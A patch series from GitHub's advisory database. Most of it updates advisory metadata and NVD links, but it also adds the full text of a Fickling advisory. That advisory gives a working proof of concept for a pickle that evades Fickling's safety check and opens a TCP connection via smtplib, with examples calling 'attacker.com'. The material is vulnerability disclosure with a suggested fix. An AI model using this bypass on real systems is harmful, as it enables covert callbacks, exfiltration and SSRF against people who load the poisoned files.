diff --git a/advisories/github-reviewed/2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json b/advisories/github-reviewed/2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json index a5ccbd0a0f67b..d0bdaf897cd8b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json +++ b/advisories/github-reviewed/2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-996q-pr4m-cvgq", - "modified": "2026-02-18T22:40:49Z", + "modified": "2026-02-23T22:20:39Z", "published": "2026-02-18T22:40:49Z", "aliases": [ "CVE-2026-27024" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-996q-pr4m-cvgq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27024" + }, { "type": "WEB", "url": "https://github.com/py-pdf/pypdf/pull/3645" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:40:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:28Z" } } \ No newline at end of file From 895a0c32f0f40d28b6e75aca294db326c78a9ec6 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:23:13 +0000 Subject: [PATCH 63/77] Publish Advisories GHSA-4hfh-fch3-5q7p GHSA-5vvm-67pj-72g4 GHSA-7g9x-cp9g-92mr GHSA-9mvc-8737-8j8h GHSA-9pq4-5hcf-288c GHSA-h7h7-mm68-gmrc GHSA-wgvp-vg3v-2xq3 --- .../2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json | 8 ++++++-- .../2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json | 8 ++++++-- .../2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json | 8 ++++++-- .../2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json | 8 ++++++-- .../2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json | 8 ++++++-- .../2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json | 8 ++++++-- .../2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json | 8 ++++++-- 7 files changed, 42 insertions(+), 14 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json index 72543cb93e987..a079fd9c57ac1 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json +++ b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4hfh-fch3-5q7p", - "modified": "2026-02-19T19:40:08Z", + "modified": "2026-02-23T22:21:47Z", "published": "2026-02-19T19:40:08Z", "aliases": [ "CVE-2026-27120" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/vapor/leaf-kit/security/advisories/GHSA-4hfh-fch3-5q7p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27120" + }, { "type": "WEB", "url": "https://github.com/vapor/leaf-kit/commit/8919e39476c3a4ba05c28b71546bb9195f87ef34" @@ -58,6 +62,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T19:40:08Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:29Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json b/advisories/github-reviewed/2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json index 38ee3f6575858..90c1d4443188d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json +++ b/advisories/github-reviewed/2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5vvm-67pj-72g4", - "modified": "2026-02-19T15:16:31Z", + "modified": "2026-02-23T22:21:12Z", "published": "2026-02-19T15:16:31Z", "aliases": [ "CVE-2026-27111" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/akuity/kargo/security/advisories/GHSA-5vvm-67pj-72g4" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27111" + }, { "type": "WEB", "url": "https://github.com/akuity/kargo/commit/833314cad5513d48d89431493325ae44c1324a49" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T15:16:31Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json b/advisories/github-reviewed/2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json index 765df23a31c30..3bbf4e3c415a3 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json +++ b/advisories/github-reviewed/2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7g9x-cp9g-92mr", - "modified": "2026-02-19T15:16:46Z", + "modified": "2026-02-23T22:21:26Z", "published": "2026-02-19T15:16:46Z", "aliases": [ "CVE-2026-27112" 
@@ -78,6 +78,10 @@
 "type": "WEB",
 "url": "https://github.com/akuity/kargo/security/advisories/GHSA-7g9x-cp9g-92mr"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27112"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/akuity/kargo/commit/155c6852ffbffa2902f18e6c7add91a846e8d344"
@@ -94,6 +98,6 @@
 "severity": "CRITICAL",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-19T15:16:46Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T22:16:29Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json b/advisories/github-reviewed/2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json
index 877af57315714..248e75921afd6 100644
--- a/advisories/github-reviewed/2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json
+++ b/advisories/github-reviewed/2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9mvc-8737-8j8h",
- "modified": "2026-02-18T22:41:24Z",
+ "modified": "2026-02-23T22:21:03Z",
 "published": "2026-02-18T22:41:24Z",
 "aliases": [
 "CVE-2026-27026"
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-9mvc-8737-8j8h"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27026"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/py-pdf/pypdf/pull/3644"
@@ -64,6 +68,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-18T22:41:24Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T22:16:29Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json b/advisories/github-reviewed/2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json
index 3872121e1116b..3df151e98ae72 100644
--- a/advisories/github-reviewed/2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json
+++ b/advisories/github-reviewed/2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9pq4-5hcf-288c",
- "modified": "2026-02-19T15:18:02Z",
+ "modified": "2026-02-23T22:21:38Z",
 "published": "2026-02-19T15:18:02Z",
 "aliases": [
 "CVE-2026-27118"
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/sveltejs/kit/security/advisories/GHSA-9pq4-5hcf-288c"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27118"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/sveltejs/kit"
@@ -52,6 +56,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-19T15:18:02Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T22:16:29Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json b/advisories/github-reviewed/2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json
index af8b34561f079..165d729b45b01 100644
--- a/advisories/github-reviewed/2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json
+++ b/advisories/github-reviewed/2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-h7h7-mm68-gmrc",
- "modified": "2026-02-19T15:18:19Z",
+ "modified": "2026-02-23T22:22:08Z",
 "published": "2026-02-19T15:18:19Z",
 "aliases": [
 "CVE-2026-27119"
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-h7h7-mm68-gmrc"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27119"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/sveltejs/svelte"
@@ -52,6 +56,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-19T15:18:19Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T23:16:02Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json b/advisories/github-reviewed/2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json
index 3b871ae330281..9ab43deb3901c 100644
--- a/advisories/github-reviewed/2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json
+++ b/advisories/github-reviewed/2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wgvp-vg3v-2xq3",
- "modified": "2026-02-18T22:41:13Z",
+ "modified": "2026-02-23T22:20:51Z",
 "published": "2026-02-18T22:41:13Z",
 "aliases": [
 "CVE-2026-27025"
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-wgvp-vg3v-2xq3"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27025"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/py-pdf/pypdf/pull/3646"
@@ -64,6 +68,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-18T22:41:13Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T22:16:28Z"
 }
 }
\ No newline at end of file
From c4a8d9ac872a96751b0050ba71b1da6e806f4b99 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Mon, 23 Feb 2026 22:25:09 +0000
Subject: [PATCH 64/77] Publish Advisories GHSA-97rm-xj73-33jh GHSA-crpf-4hrx-3jrp GHSA-f7gr-6p89-r883 GHSA-m56q-vw4c-c2cp
---
 .../2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json | 8 ++++++--
 .../2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json | 8 ++++++--
 .../2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json | 8 ++++++--
 .../2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json | 8 ++++++--
 4 files changed, 24 insertions(+), 8 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json b/advisories/github-reviewed/2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json
index 27ab365103a7c..ee9e8fcbb4f0a 100644
--- a/advisories/github-reviewed/2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json
+++ b/advisories/github-reviewed/2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-97rm-xj73-33jh",
- "modified": "2026-02-19T20:27:11Z",
+ "modified": "2026-02-23T22:23:34Z",
 "published": "2026-02-19T20:27:11Z",
 "aliases": [
 "CVE-2026-27203"
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/YosefHayim/ebay-mcp/security/advisories/GHSA-97rm-xj73-33jh"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27203"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/YosefHayim/ebay-mcp/commit/aab0bda75ea9dd27aa37d0d8524d7cf41b3c4a9a"
@@ -57,6 +61,6 @@
 "severity": "HIGH",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-19T20:27:11Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-21T00:16:17Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json b/advisories/github-reviewed/2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json
index 0ff56e9b61c88..46c3cc26d8aac 100644
--- a/advisories/github-reviewed/2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json
+++ b/advisories/github-reviewed/2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-crpf-4hrx-3jrp",
- "modified": "2026-02-19T20:28:49Z",
+ "modified": "2026-02-23T22:23:50Z",
 "published": "2026-02-19T20:28:49Z",
 "aliases": [
 "CVE-2026-27125"
@@ -43,6 +43,10 @@
 "type": "WEB",
 "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-crpf-4hrx-3jrp"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27125"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/sveltejs/svelte/commit/73098bb26c6f06e7fd1b0746d817d2c5ee90755f"
@@ -63,6 +67,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-19T20:28:49Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T23:16:02Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json b/advisories/github-reviewed/2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json
index 3decac2d67950..c161c81275781 100644
--- a/advisories/github-reviewed/2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json
+++ b/advisories/github-reviewed/2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f7gr-6p89-r883",
- "modified": "2026-02-19T15:18:33Z",
+ "modified": "2026-02-23T22:23:05Z",
 "published": "2026-02-19T15:18:33Z",
 "aliases": [
 "CVE-2026-27121"
@@ -43,6 +43,10 @@
 "type": "WEB",
 "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-f7gr-6p89-r883"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27121"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/sveltejs/svelte"
@@ -55,6 +59,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-19T15:18:33Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T23:16:02Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json b/advisories/github-reviewed/2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json
index 4d21f50aa3d75..a9d794b7b9128 100644
--- a/advisories/github-reviewed/2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json
+++ b/advisories/github-reviewed/2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m56q-vw4c-c2cp",
- "modified": "2026-02-19T15:18:42Z",
+ "modified": "2026-02-23T22:23:26Z",
 "published": "2026-02-19T15:18:42Z",
 "aliases": [
 "CVE-2026-27122"
@@ -43,6 +43,10 @@
 "type": "WEB",
 "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-m56q-vw4c-c2cp"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27122"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/sveltejs/svelte"
@@ -55,6 +59,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-19T15:18:42Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T23:16:02Z"
 }
 }
\ No newline at end of file
From 66ce5632fdf4bc4ec8bb2fdc4e38b0fd796c9720 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Mon, 23 Feb 2026 22:27:03 +0000
Subject: [PATCH 65/77] Publish Advisories GHSA-83pf-v6qq-pwmr GHSA-8r7r-f4gm-wcpq GHSA-c87c-78rc-vmv2 GHSA-mp4x-c34x-wv3x GHSA-ppf9-4ffw-hh4p
---
 .../02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json | 11 +++++++----
 .../02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json | 8 ++++++--
 .../02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json | 8 ++++++--
 .../02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json | 8 ++++++--
 .../02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json | 8 ++++++--
 5 files changed, 31 insertions(+), 12 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json b/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json
index b624bac6e6e65..5173a6b26e105 100644
--- a/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json
+++ b/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json
@@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-83pf-v6qq-pwmr", - "modified": "2026-02-20T18:24:46Z", + "modified": "2026-02-23T22:25:43Z", "published": "2026-02-20T18:24:46Z", "aliases": [], "summary": "Fickling has a detection bypass via stdlib network-protocol constructors", - "details": "# Our assessment\n\n`imtplib`, `imaplib`, `ftplib`, `poplib`, `telnetlib`, and `nntplib` are added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/6d20564d23acf14b42ec883908aed159be7b9ade). The `UnusedVariables` heuristic works as expected.\n\n# Original report \n\n## Summary\n\nFickling's `check_safety()` API and `--check-safety` CLI flag incorrectly rate as\n`LIKELY_SAFE` pickle files that open outbound TCP connections at deserialization time\nusing stdlib network-protocol constructors: `smtplib.SMTP`, `imaplib.IMAP4`,\n`ftplib.FTP`, `poplib.POP3`, `telnetlib.Telnet`, and `nntplib.NNTP`.\n\nThe bypass exploits two independent root causes described below.\n\n---\n\n## Root Cause 1: Incomplete blocklist (fixed in PR #233)\n\n`fickling/fickle.py` (lines 41-97) defines `UNSAFE_IMPORTS`, the primary blocklist.\n`fickling/analysis.py` (lines 229-248) defines the parallel\n`UnsafeImportsML.UNSAFE_MODULES` dict. Both omitted the following stdlib\nnetwork-protocol modules whose constructors open a TCP socket at instantiation time:\n\n| Module | Class | Default port | Constructor side-effect |\n|---|---|---|---|\n| `smtplib` | `SMTP` | 25 | TCP connect, reads SMTP banner, sends EHLO |\n| `imaplib` | `IMAP4` | 143 | TCP connect, reads IMAP capability banner |\n| `ftplib` | `FTP` | 21 | TCP connect, reads FTP welcome banner |\n| `poplib` | `POP3` | 110 | TCP connect, reads POP3 greeting |\n| `telnetlib` | `Telnet` | 23 | TCP connect |\n| `nntplib` | `NNTP` | 119 | TCP connect, NNTP handshake |\n\nBecause these module names were absent from both blocklists, `UnsafeImportsML`,\n`UnsafeImports`, and `NonStandardImports` all stayed silent. 
All six are genuine\nstdlib modules so `is_std_module()` returned `True` and `NonStandardImports` did\nnot fire.\n\n**Status: patched in PR #233.** The six modules have been added to `UNSAFE_IMPORTS`.\n\n---\n\n## Root Cause 2: Logic flaw in `unused_assignments()` at `fickle.py:1183` (unpatched)\n\n### Description\n\n`unused_assignments()` in `fickling/fickle.py` (lines 1174-1204) identifies variables\nthat are assigned but never referenced. `UnusedVariables` analysis calls this method\nand raises `SUSPICIOUS` for any unreferenced variable -- this would otherwise catch a\nbare `REDUCE` opcode that stores its result without using it.\n\nThe flaw is at line 1183. The method iterates over `module_body` statements and, when\nit encounters the final `result = ` assignment, breaks out of the loop\nimmediately without first walking the right-hand side expression for `Name` references:\n\n```python\n# fickling/fickle.py:1183 (current code -- vulnerable)\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # this is the return value of the program\n break # exits WITHOUT scanning statement.value\n```\n\nAny variable that appears only in the RHS of `result = ` is therefore never\nadded to the `used` set and is incorrectly classified as unused.\n\n### How this enables bypass suppression\n\nWhen fickling processes a `REDUCE` opcode in isolation, it generates:\n\n```python\n_var0 = SMTP('attacker.com', 25)\nresult = _var0\n```\n\nBecause the loop breaks before scanning `result = _var0`, `_var0` never enters\n`used`. 
`UnusedVariables` sees `_var0` as unused and raises `SUSPICIOUS`.\n\nAdding a `BUILD` opcode with an empty dict after the `REDUCE` changes the generated\nAST to:\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25) # dangerous call\n_var1 = _var0 # BUILD step 1: intermediate reference\n_var1.__setstate__({}) # BUILD step 2: state call\nresult = _var1\n```\n\nNow `_var0` appears on the RHS of `_var1 = _var0`, a statement processed before the\nbreak, so `_var0` correctly enters `used` and `UnusedVariables` stays silent.\n\nThe `__setstate__` call is excluded from `OvertlyBadEvals` because\n`ASTProperties.visit_Call` places it in `calls` but not in `non_setstate_calls`\n(line 562), and `OvertlyBadEvals` only iterates `non_setstate_calls`.\n\nThe `SMTP(...)` call is skipped by `OvertlyBadEvals` because `_process_import` adds\n`SMTP` to `likely_safe_imports` for any stdlib module (line 550), and `OvertlyBadEvals`\nskips calls whose function name is in `likely_safe_imports` (lines 339-345).\n\n**Net result: zero warnings, severity `LIKELY_SAFE`.**\n\nThis flaw is generic -- it applies to any module not on the blocklist, not just the\nsix fixed in PR #233. Any future blocklist gap can be silently exploited using the\nsame `REDUCE + EMPTY_DICT + BUILD` pattern as long as this flaw remains unpatched.\n\n### Bypass opcode sequence\n\n```\nOffset Opcode Argument\n------ ------ --------\n0 PROTO 4\n2 GLOBAL 'smtplib' 'SMTP'\n16 SHORT_BINUNICODE 'attacker.com'\n30 BININT2 25\n33 TUPLE2\n34 REDUCE <- TCP connection opened here\n35 EMPTY_DICT\n36 BUILD <- suppresses UnusedVariables via flaw\n37 STOP\n```\n\nFickling's synthetic AST for this sequence (what all analysis passes inspect):\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25)\n_var1 = _var0\n_var1.__setstate__({})\nresult = _var1\n```\n\nNo analysis rule in fickling fires on this AST.\n\n### Proof of Concept\n\nRequires only `pip install fickling`. 
Save as `poc.py` and run.\n\n```python\nimport socket\nimport threading\nimport pickle\n\ndef build_bypass_pickle(host: str, port: int) -> bytes:\n h = host.encode(\"utf-8\")\n return b\"\".join([\n b\"\\x80\\x04\",\n b\"csmtplib\\nSMTP\\n\",\n b\"\\x8c\" + bytes([len(h)]) + h,\n b\"M\" + bytes([port & 0xFF, (port >> 8) & 0xFF]),\n b\"\\x86\", # TUPLE2\n b\"R\", # REDUCE\n b\"}\", # EMPTY_DICT\n b\"b\", # BUILD\n b\".\", # STOP\n ])\n\ndef run_poc():\n from fickling.analysis import check_safety\n from fickling.fickle import Pickled\n\n HOST, PORT = \"127.0.0.1\", 19902\n received = []\n\n def listener():\n srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n srv.bind((HOST, PORT))\n srv.listen(1)\n srv.settimeout(5)\n try:\n conn, addr = srv.accept()\n received.append(addr)\n conn.close()\n except socket.timeout:\n pass\n srv.close()\n\n t = threading.Thread(target=listener, daemon=True)\n t.start()\n\n raw = build_bypass_pickle(HOST, PORT)\n loaded = Pickled.load(raw)\n result = check_safety(loaded)\n\n print(f\"[*] fickling severity : {result.severity.name}\")\n print(f\"[*] fickling is_safe : {result.severity.name == 'LIKELY_SAFE'}\")\n\n assert result.severity.name == \"LIKELY_SAFE\", \"Bypass failed\"\n print(\"[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\")\n\n print(\"[*] Calling pickle.loads() to simulate victim loading the file...\")\n try:\n pickle.loads(raw)\n except Exception:\n pass\n\n t.join(timeout=5)\n\n if received:\n print(f\"[+] Incoming TCP connection received from {received[0]}\")\n print(\"[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\")\n else:\n print(\"[-] No TCP connection received (network blocked)\")\n print(\" fickling still rated LIKELY_SAFE -- static analysis bypass confirmed regardless\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n### Expected output\n\n```\n[*] fickling severity : LIKELY_SAFE\n[*] 
fickling is_safe : True\n[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\n[*] Calling pickle.loads() to simulate victim loading the file...\n[+] Incoming TCP connection received from ('127.0.0.1', 58412)\n[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\n```\n\nTested on Python 3.11.1, Windows. Not OS-specific.\n\n### Impact\n\nAn attacker distributing a malicious pickle file (e.g. a crafted ML model checkpoint)\ncan silently:\n\n- **Enumerate victims** -- receive a TCP callback every time the pickle is loaded,\n including in sandboxed environments\n- **Exfiltrate host identity** -- victim IP, hostname (via SMTP EHLO), and service\n banners are sent to the attacker's server\n- **Probe internal services (SSRF)** -- if the victim host can reach internal SMTP\n relays, IMAP stores, or FTP servers, the pickle probes those services on the\n attacker's behalf\n- **Establish a covert channel** -- protocol handshakes carry attacker-controlled\n bytes through a channel fickling explicitly labels safe\n\nThe `is_likely_safe()` helper (`fickling/analysis.py:468-474`) and the `--check-safety`\nCLI flag both gate on `severity == LIKELY_SAFE`. This bypass clears that gate\ncompletely with zero warnings.\n\n### Suggested fix\n\nWalk `statement.value` before the `break` so variables referenced only in the result\nassignment are correctly counted as used:\n\n```python\n# fickling/fickle.py:1183 -- suggested fix\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # scan RHS before breaking so variables used only here are marked as used\n for node in ast.walk(statement.value):\n if isinstance(node, ast.Name):\n used.add(node.id)\n break\n```\n\nThis is the same pattern already used for every other statement in the loop\n(lines 1200-1203). 
